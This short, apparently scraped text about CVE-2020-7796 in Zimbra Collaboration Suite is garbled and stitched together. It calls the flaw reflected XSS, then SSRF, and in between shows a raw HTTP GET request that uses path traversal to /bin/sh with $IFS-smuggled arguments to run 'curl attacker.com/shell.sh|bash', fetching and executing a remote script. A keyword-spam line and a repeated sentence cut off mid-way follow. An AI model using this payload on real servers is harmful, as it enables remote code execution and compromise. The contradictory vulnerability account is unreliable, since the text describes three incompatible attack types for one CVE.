By injecting JavaScript into the user or loc parameters, an attacker can bypass Zimbra’s built-in anti-XSS filters. The injected script is then reflected back to the victim in the HTTP response without proper encoding. Because the vulnerable endpoint is accessible (due to misconfigured or default proxy routes), the attacker can force any logged-in Zimbra user to execute arbitrary JavaScript in their browser context.
GET /service/extension/UserServlet?ext=com.zimbra.cs.extension.ExtensionUtil&file=../../../../../../../bin/sh&-c$IFScurl$IFSattacker.com/shell.sh|bash HTTP/1.1 Host: victim.zimbra.com cve20207796 zimbra collaboration suite full
CVE-2020-7796 is a vulnerability in the Zimbra Collaboration Suite (ZCS) . It primarily affects versions of ZCS prior to 8.8.15 Patch 7 . Technical Vulnerability Overview Vulnerability Type: Server-Side Request Forgery (SSRF). By injecting JavaScript into the user or loc